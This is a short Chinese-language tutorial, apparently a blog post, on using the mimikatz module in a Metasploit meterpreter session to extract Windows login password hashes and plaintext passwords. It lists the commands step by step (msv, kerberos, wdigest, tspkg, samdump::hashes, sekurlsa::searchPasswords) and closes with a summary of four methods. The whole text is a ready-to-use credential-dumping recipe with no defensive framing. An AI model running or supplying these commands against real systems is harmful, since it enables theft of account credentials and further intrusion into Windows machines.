meterpreter中使用mimikatz获取windows密码

进去meterpreter后getuid一下

这获得系统管理员权限

开始

加载mimikatz模块

load mimikatz
           

加载成功.

第一种方法：

获取登录密码的hash值

msv
           

上面已经是得到hash值了. 下面算明文密码.

获取明文密码

kerberos
           

look...拿到登录的明文密码了.

第二种方法：

使用另一种方式获取哈希值

mimikatz_command -f samdump::hashes
           

根据上面的方式获取明文密码

mimikatz_command -f sekurlsa::searchPasswords
           

第三种方法：

Wdigest命令

这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.

wdigest
           

第四种方法：

tspkg命令

tspkg
           

总结

一、
load mimikatz #加载mimikatz
msv #获取hash值
kerberos #获取明文

二、
load mimikatz #加载mimikatz
wdigest #获取系统账户信息

三、
load mimikatz #加载mimikatz
tspkg #获取系统账户信息

四、
load mimikatz #加载mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords